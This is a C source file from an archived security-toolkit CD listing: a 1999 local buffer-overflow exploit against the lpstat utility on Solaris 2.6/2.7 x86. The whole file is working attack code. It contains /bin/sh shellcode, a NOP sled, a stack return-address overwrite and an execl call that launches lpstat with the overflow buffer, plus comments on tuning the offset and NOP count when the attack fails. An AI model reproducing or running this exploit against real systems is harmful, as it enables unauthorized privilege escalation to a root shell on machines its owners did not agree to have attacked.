home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lpstat2.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  64 lines

  1. /*
  2.  * lpstat sploit for solaris 2.6/2.7
  3.  * by plasmoid/deep/thc <plasmoid@pimmel.com> (c) 1999
  4.  * supported by insected and wilkins
  5.  *
  6.  * THC - The Hacker's Choice
  7.  * http://thc.inferno.tusculum.edu
  8.  */
  9.  
  10. #include <unistd.h>
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14.  
  15. char shell[] =
  16.   "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  17.   "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  18.   "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  19.   "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  20.   "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  21.   "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  22.  
  23. const int buffersize=1100;
  24. const char x86_nop=0x90;
  25. long nop,esp;
  26. long offset=0;
  27. char buffer[2000];
  28.  
  29. long get_esp()
  30. {
  31.   __asm__("movl %esp,%eax");
  32. }
  33.  
  34. int main (int argc, char *argv[])
  35. {
  36.   int i;
  37.  
  38.   /* you shouldn't edit the offset, we run with
  39.      800 nops in 1100 bytes buffer, one of those
  40.      nops should be hit */
  41.  
  42.   if (argc > 1) offset = strtol(argv[1], NULL, 0);
  43.  
  44.   /* if you don't succeed, modify the nop count,
  45.      the standart value of 801 bybtes is quite
  46.      strange enuff */
  47.  
  48.   if (argc > 2) nop = strtoul(argv[2], NULL, 0);
  49.   else
  50.     nop = 801;
  51.  
  52.   esp = get_esp();
  53.   memset(buffer, x86_nop, buffersize);
  54.   memcpy(buffer+nop, shell, strlen(shell));
  55.  
  56.   for (i = nop+strlen(shell); i < buffersize-4; i += 4)
  57.     *((int *) &buffer[i]) = esp+offset;
  58.  
  59.   execl("/usr/bin/lpstat", "lpstat", "-c", buffer, NULL);
  60.  
  61.   printf("exec failed!\n");
  62.   return 0;
  63. }
  64. /*                    www.hack.co.za              [2000]*/